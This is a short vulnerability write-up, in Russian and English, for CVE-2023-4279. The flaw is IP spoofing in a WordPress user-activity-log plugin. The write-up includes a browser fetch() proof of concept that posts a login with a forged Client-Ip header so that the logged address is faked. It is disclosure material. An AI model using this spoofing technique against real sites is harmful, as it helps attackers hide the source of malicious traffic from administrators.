
Репозиторий для уязвимости CVE-2023-4279.
Идентификатор CVE: CVE-2023-4279
Тип уязвимости: Спуфинг IP-адреса
Описание: Этот плагин извлекает IP-адреса клиентов из потенциально ненадёжных заголовков, что позволяет злоумышленнику манипулировать их значением. Это может быть использовано для скрытия источника вредоносного трафика.
Шаги для воспроизведения:
1. In User Activity Log > Settings, enable the setting "Allow Ip Address of users to log." and save settings.
2. Run the following code in the web browser and note on the backend that the IP address has been faked.
await fetch("/wp-login.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
"Client-Ip": "8.8.8.8",
},
"body": "log=USERNAME&pwd=PASSWORD",
"method": "POST",
"mode": "cors",
"credentials": "include"
});
Ссылки: